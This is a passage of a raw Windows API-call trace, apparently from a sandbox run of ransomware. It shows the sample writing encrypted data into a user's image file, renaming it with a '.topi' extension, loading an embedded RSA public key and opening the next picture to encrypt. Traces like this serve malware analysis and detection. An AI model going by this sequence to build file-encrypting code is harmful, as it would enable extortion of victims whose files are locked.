(HeapHandle=0x680000, Flags=0x0, Size=0x8) returned 0x316e9c8 [0095.383] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x10e) returned 0x31b6350 [0095.383] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31ef928 [0095.383] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x58) returned 0x99d9d48 [0095.383] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x14) returned 0x314d0e8 [0095.383] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x104) returned 0x31919a8 [0095.383] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x14) returned 0x314df08 [0095.383] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e9a8 [0095.383] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31b6350 | out: hHeap=0x680000) returned 1 [0095.383] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d9498 | out: hHeap=0x680000) returned 1 [0095.383] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e9c8 | out: hHeap=0x680000) returned 1 [0095.383] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d9480 | out: hHeap=0x680000) returned 1 [0095.383] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x314d0a8 | out: hHeap=0x680000) returned 1 [0095.383] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e948 | out: hHeap=0x680000) returned 1 [0095.383] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d89a0 | out: hHeap=0x680000) returned 1 [0095.383] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31ef928 | out: hHeap=0x680000) returned 1 [0095.383] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d9e08 | out: hHeap=0x680000) returned 1 [0095.383] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e9300 | out: hHeap=0x680000) returned 1 [0095.383] GetCurrentThreadId () returned 0x8c4 [0095.383] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x100) returned 0x99dea38 [0095.383] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x82) returned 0x99f6100 [0095.383] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x2c) returned 0x31c3f78 [0095.383] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x80) returned 0x6df228 [0095.383] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x148) returned 0x31ce620 [0095.384] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e948 [0095.384] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e9c8 [0095.384] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x100) returned 0x99deb40 [0095.384] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x64) returned 0x751ab8 [0095.384] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x751ab8 | out: hHeap=0x680000) returned 1 [0095.384] GetCurrentThreadId () returned 0x8c4 [0095.384] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x64) returned 0x751ab8 [0095.384] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x751ab8 | out: hHeap=0x680000) returned 1 [0095.384] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xeb) returned 0x99e4988 [0095.384] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x64) returned 0x751ab8 [0095.384] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x751ab8 | out: hHeap=0x680000) returned 1 [0095.384] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x64) returned 0x751ab8 [0095.384] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x751ab8 | out: hHeap=0x680000) returned 1 [0095.384] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e4988 | out: hHeap=0x680000) returned 1 [0095.384] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x100) returned 0x99ded50 [0095.384] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e948 | out: hHeap=0x680000) returned 1 [0095.384] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4c) returned 0x31cb568 [0095.384] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e948 [0095.384] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x100) returned 0x99dee58 [0095.384] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e998 [0095.384] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99d89a0 [0095.384] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e998 | out: hHeap=0x680000) returned 1 [0095.384] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e998 [0095.385] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e9b8 [0095.385] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e9f8 [0095.385] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e968 [0095.385] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e958 [0095.385] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e918 [0095.385] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e9d8 [0095.385] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99d9480 [0095.385] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e9b8 | out: hHeap=0x680000) returned 1 [0095.385] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x8) returned 0x316e9b8 [0095.385] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e998 | out: hHeap=0x680000) returned 1 [0095.385] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e998 [0095.385] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e9e8 [0095.385] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316ea08 [0095.385] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316ea18 [0095.385] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99d9498 [0095.385] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316ea08 | out: hHeap=0x680000) returned 1 [0095.385] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x14) returned 0x314d0a8 [0095.385] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e9e8 | out: hHeap=0x680000) returned 1 [0095.385] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99d9468 [0095.385] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316ea18 | out: hHeap=0x680000) returned 1 [0095.385] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99d8e80 [0095.385] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e998 | out: hHeap=0x680000) returned 1 [0095.385] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99d8eb0 [0095.385] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e9f8 | out: hHeap=0x680000) returned 1 [0095.385] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99d8e68 [0095.385] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e918 | out: hHeap=0x680000) returned 1 [0095.386] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x10) returned 0x99d94b0 [0095.386] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d8e68 | out: hHeap=0x680000) returned 1 [0095.386] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x10) returned 0x99d8e68 [0095.386] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d8eb0 | out: hHeap=0x680000) returned 1 [0095.386] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x8) returned 0x316e918 [0095.386] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e948 | out: hHeap=0x680000) returned 1 [0095.386] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x14) returned 0x314c608 [0095.386] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e918 | out: hHeap=0x680000) returned 1 [0095.386] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x18) returned 0x314c768 [0095.386] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d9480 | out: hHeap=0x680000) returned 1 [0095.386] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99d9480 [0095.386] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e9b8 | out: hHeap=0x680000) returned 1 [0095.386] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x204) returned 0x99e9300 [0095.386] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d89a0 | out: hHeap=0x680000) returned 1 [0095.386] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x108) returned 0x3191ac0 [0095.386] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d8e68 | out: hHeap=0x680000) returned 1 [0095.386] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x210) returned 0x99e9528 [0095.386] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x314c768 | out: hHeap=0x680000) returned 1 [0095.386] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x10c) returned 0x31b6350 [0095.386] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e968 | out: hHeap=0x680000) returned 1 [0095.386] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x108) returned 0x3191bd8 [0095.386] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d9480 | out: hHeap=0x680000) returned 1 [0095.386] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x200) returned 0x31d5100 [0095.386] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x3191ac0 | out: hHeap=0x680000) returned 1 [0095.387] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x100) returned 0x99def60 [0095.387] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e9c8 | out: hHeap=0x680000) returned 1 [0095.387] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x6df228 | out: hHeap=0x680000) returned 1 [0095.387] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99ded50 | out: hHeap=0x680000) returned 1 [0095.387] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99def60 | out: hHeap=0x680000) returned 1 [0095.387] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x314c608 | out: hHeap=0x680000) returned 1 [0095.387] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x3191bd8 | out: hHeap=0x680000) returned 1 [0095.387] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e9528 | out: hHeap=0x680000) returned 1 [0095.387] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31d5100 | out: hHeap=0x680000) returned 1 [0095.387] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31b6350 | out: hHeap=0x680000) returned 1 [0095.387] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e958 | out: hHeap=0x680000) returned 1 [0095.387] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d94b0 | out: hHeap=0x680000) returned 1 [0095.387] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e9d8 | out: hHeap=0x680000) returned 1 [0095.387] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d8e80 | out: hHeap=0x680000) returned 1 [0095.387] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x314d0a8 | out: hHeap=0x680000) returned 1 [0095.387] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d9498 | out: hHeap=0x680000) returned 1 [0095.387] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d9468 | out: hHeap=0x680000) returned 1 [0095.387] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31ce620 | out: hHeap=0x680000) returned 1 [0095.387] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31c3f78 | out: hHeap=0x680000) returned 1 [0095.387] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99deb40 | out: hHeap=0x680000) returned 1 [0095.387] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d9450 | out: hHeap=0x680000) returned 1 [0095.388] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99f1ba8 | out: hHeap=0x680000) returned 1 [0095.388] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e9300 | out: hHeap=0x680000) returned 1 [0095.388] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99dee58 | out: hHeap=0x680000) returned 1 [0095.388] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31cb568 | out: hHeap=0x680000) returned 1 [0095.388] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31919a8 | out: hHeap=0x680000) returned 1 [0095.388] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x314d0e8 | out: hHeap=0x680000) returned 1 [0095.388] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e9a8 | out: hHeap=0x680000) returned 1 [0095.388] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x314df08 | out: hHeap=0x680000) returned 1 [0095.388] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d9d48 | out: hHeap=0x680000) returned 1 [0095.388] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e1b68 | out: hHeap=0x680000) returned 1 [0095.388] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31c3fb0 | out: hHeap=0x680000) returned 1 [0095.388] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e1970 | out: hHeap=0x680000) returned 1 [0095.388] WriteFile (in: hFile=0x6a8, lpBuffer=0x99f72d8*, nNumberOfBytesToWrite=0x85fe, lpNumberOfBytesWritten=0x9ccfb14, lpOverlapped=0x0 | out: lpBuffer=0x99f72d8*, lpNumberOfBytesWritten=0x9ccfb14*=0x85fe, lpOverlapped=0x0) returned 1 [0095.388] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99f72d8 | out: hHeap=0x680000) returned 1 [0095.388] SetFilePointerEx (in: hFile=0x6a8, liDistanceToMove=0x8603, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0095.388] WriteFile (in: hFile=0x6a8, lpBuffer=0x99dea38*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x9ccfb50, lpOverlapped=0x0 | out: lpBuffer=0x99dea38*, lpNumberOfBytesWritten=0x9ccfb50*=0x100, lpOverlapped=0x0) returned 1 [0095.389] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99dea38 | out: hHeap=0x680000) returned 1 [0095.389] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x60) returned 0x316dcb8 [0095.389] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x428) returned 0x31d01f0 [0095.389] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ywA3qgOrH00u8DIzdAJmeI3ndBL6uaF5KTvM8FRT", cchWideChar=-1, lpMultiByteStr=0x31d01f0, cbMultiByte=1064, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ywA3qgOrH00u8DIzdAJmeI3ndBL6uaF5KTvM8FRT", lpUsedDefaultChar=0x0) returned 41 [0095.389] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x430) returned 0x31d0980 [0095.389] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31d01f0 | out: hHeap=0x680000) returned 1 [0095.389] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316dcb8 | out: hHeap=0x680000) returned 1 [0095.389] WriteFile (in: hFile=0x6a8, lpBuffer=0x31d0980*, nNumberOfBytesToWrite=0x28, lpNumberOfBytesWritten=0x9ccfb50, lpOverlapped=0x0 | out: lpBuffer=0x31d0980*, lpNumberOfBytesWritten=0x9ccfb50*=0x28, lpOverlapped=0x0) returned 1 [0095.389] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31d0980 | out: hHeap=0x680000) returned 1 [0095.389] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0095.389] WriteFile (in: hFile=0x6a8, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x9ccfb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x9ccfb50*=0x26, lpOverlapped=0x0) returned 1 [0095.389] CloseHandle (hObject=0x6a8) returned 1 [0095.397] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x70) returned 0x3161e60 [0095.397] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x870) returned 0x31cf750 [0095.397] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x3161e60 | out: hHeap=0x680000) returned 1 [0095.397] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\aji-jvy.png" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\aji-jvy.png"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\aji-jvy.png.topi" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\aji-jvy.png.topi")) returned 1 [0095.398] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31cf750 | out: hHeap=0x680000) returned 1 [0095.398] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31c3fe8 | out: hHeap=0x680000) returned 1 [0095.398] VirtualFree (lpAddress=0x3750000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0095.399] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31cab80 | out: hHeap=0x680000) returned 1 [0095.399] FindNextFileW (in: hFindFile=0x31c7500, lpFindFileData=0x9ccfba4 | out: lpFindFileData=0x9ccfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6f1d260, ftCreationTime.dwHighDateTime=0x1d5b683, ftLastAccessTime.dwLowDateTime=0xf2a93340, ftLastAccessTime.dwHighDateTime=0x1d5b7bb, ftLastWriteTime.dwLowDateTime=0xf2a93340, ftLastWriteTime.dwHighDateTime=0x1d5b7bb, nFileSizeHigh=0x0, nFileSizeLow=0xd5f3, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="CBFd5Z-W.gif", cAlternateFileName="")) returned 1 [0095.399] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x50) returned 0x31cb568 [0095.399] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x76) returned 0x31cab80 [0095.399] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31cb568 | out: hHeap=0x680000) returned 1 [0095.399] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\CBFd5Z-W.gif") returned=".gif" [0095.400] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\CBFd5Z-W.gif" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\cbfd5z-w.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x6a8 [0095.400] GetFileSizeEx (in: hFile=0x6a8, lpFileSize=0x9ccfb40 | out: lpFileSize=0x9ccfb40*=54771) returned 1 [0095.400] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x3750000 [0095.403] SetFilePointerEx (in: hFile=0x6a8, liDistanceToMove=0xd5cd, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0095.403] ReadFile (in: hFile=0x6a8, lpBuffer=0x3750000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x9ccfb78, lpOverlapped=0x0 | out: lpBuffer=0x3750000*, lpNumberOfBytesRead=0x9ccfb78*=0x26, lpOverlapped=0x0) returned 1 [0095.404] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x30) returned 0x31c3fe8 [0095.404] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31c3fe8 | out: hHeap=0x680000) returned 1 [0095.405] SetFilePointer (in: hFile=0x6a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0095.405] ReadFile (in: hFile=0x6a8, lpBuffer=0x3750000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x9ccfb70, lpOverlapped=0x0 | out: lpBuffer=0x3750000*, lpNumberOfBytesRead=0x9ccfb70*=0xd5f3, lpOverlapped=0x0) returned 1 [0095.405] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAxnvHZzybKGUxH+Cc7ttW\\\\nHyoUm91TmryPiZ9LNnaMWhnZS7t38EODQuii2GcK55Ao4ABm2yEHPJ14ahmXpL+n\\\\n\\/k8p8BIMBjXGBDQcLASJ22fAabOruiNa83d0jz71y4\\/zLglfnHHFdyjFfNDlFvgG\\\\nipjfuYMJ2awwHYNxu0eGTRwFoeFN0gYV8wJauSL2tH\\/CRGeRp0GzRCXBasIKVhIe\\\\n6PmZEE3u03hDY6XBRU8yz4AFxBhgSJDJrrSoUyYfhrrxBXfeEicdl5iq8yJIRGs+\\\\nZiX0IBUK3KZQidFLch4zt8Xm8hGfH5Rks+xUVIAQP7+M3VHWYK9GmZZ5tjyWxwoO\\\\nIQIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0095.405] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x1f1) returned 0x31d5100 [0095.405] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAxnvHZzybKGUxH+Cc7ttW\\\\nHyoUm91TmryPiZ9LNnaMWhnZS7t38EODQuii2GcK55Ao4ABm2yEHPJ14ahmXpL+n\\\\n\\/k8p8BIMBjXGBDQcLASJ22fAabOruiNa83d0jz71y4\\/zLglfnHHFdyjFfNDlFvgG\\\\nipjfuYMJ2awwHYNxu0eGTRwFoeFN0gYV8wJauSL2tH\\/CRGeRp0GzRCXBasIKVhIe\\\\n6PmZEE3u03hDY6XBRU8yz4AFxBhgSJDJrrSoUyYfhrrxBXfeEicdl5iq8yJIRGs+\\\\nZiX0IBUK3KZQidFLch4zt8Xm8hGfH5Rks+xUVIAQP7+M3VHWYK9GmZZ5tjyWxwoO\\\\nIQIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0095.405] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAxnvHZzybKGUxH+Cc7ttW\\\\nHyoUm91TmryPiZ9LNnaMWhnZS7t38EODQuii2GcK55Ao4ABm2yEHPJ14ahmXpL+n\\\\n\\/k8p8BIMBjXGBDQcLASJ22fAabOruiNa83d0jz71y4\\/zLglfnHHFdyjFfNDlFvgG\\\\nipjfuYMJ2awwHYNxu0eGTRwFoeFN0gYV8wJauSL2tH\\/CRGeRp0GzRCXBasIKVhIe\\\\n6PmZEE3u03hDY6XBRU8yz4AFxBhgSJDJrrSoUyYfhrrxBXfeEicdl5iq8yJIRGs+\\\\nZiX0IBUK3KZQidFLch4zt8Xm8hGfH5Rks+xUVIAQP7+M3VHWYK9GmZZ5tjyWxwoO\\\\nIQIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0095.405] CryptAcquireContextW (in: phProv=0x9ccfa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x9ccfa50*=0x6df228) returned 1 [0095.406] CryptCreateHash (in: hProv=0x6df228, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x9ccfa58 | out: phHash=0x9ccfa58) returned 1 [0095.406] CryptHashData (hHash=0x31c7580, pbData=0x31d5100, dwDataLen=0x1f1, dwFlags=0x0) returned 1 [0095.407] CryptGetHashParam (in: hHash=0x31c7580, dwParam=0x2, pbData=0x0, pdwDataLen=0x9ccfa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x9ccfa54) returned 1 [0095.407] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x11) returned 0x314d0e8 [0095.407] CryptGetHashParam (in: hHash=0x31c7580, dwParam=0x2, pbData=0x314d0e8, pdwDataLen=0x9ccfa54, dwFlags=0x0 | out: pbData=0x314d0e8, pdwDataLen=0x9ccfa54) returned 1 [0095.407] GetLastError () returned 0x0 [0095.407] CryptDestroyHash (hHash=0x31c7580) returned 1 [0095.407] CryptReleaseContext (hProv=0x6df228, dwFlags=0x0) returned 1 [0095.407] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31d5100 | out: hHeap=0x680000) returned 1 [0095.407] UuidCreate (in: Uuid=0x9ccfa48 | out: Uuid=0x9ccfa48) returned 0x0 [0095.407] UuidToStringA (in: Uuid=0x9ccfa48, StringUuid=0x9ccfa40 | out: StringUuid=0x9ccfa40) returned 0x0 [0095.407] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x30) returned 0x31c3fb0 [0095.407] RpcStringFreeA (in: String=0x9ccfa40 | out: String=0x9ccfa40) returned 0x0 [0095.407] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31c3fe8 | out: hHeap=0x680000) returned 1 [0095.407] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x30) returned 0x31c3fe8 [0095.407] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xd5f0) returned 0x99f72d8 [0095.408] SetFilePointer (in: hFile=0x6a8, lDistanceToMove=5, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x5 [0095.408] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31c3fb0 | out: hHeap=0x680000) returned 1 [0095.408] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x1f0) returned 0x99e1970 [0095.408] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x30) returned 0x31c3fb0 [0095.408] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x1f0) returned 0x99e1b68 [0095.408] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x58) returned 0x99d9d48 [0095.408] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x40) returned 0x99f1ba8 [0095.408] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99d9450 [0095.408] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x40) returned 0x99f1bf0 [0095.408] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99d9468 [0095.409] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99d9498 [0095.409] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99d8e80 [0095.409] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99d94b0 [0095.409] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x24) returned 0x31d4940 [0095.409] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x158) returned 0x9a04a18 [0095.409] RtlReAllocateHeap (Heap=0x680000, Flags=0x0, Ptr=0x9a04a18, Size=0x218) returned 0x99e9300 [0095.409] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x558) returned 0x31d01f0 [0095.409] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d9498 | out: 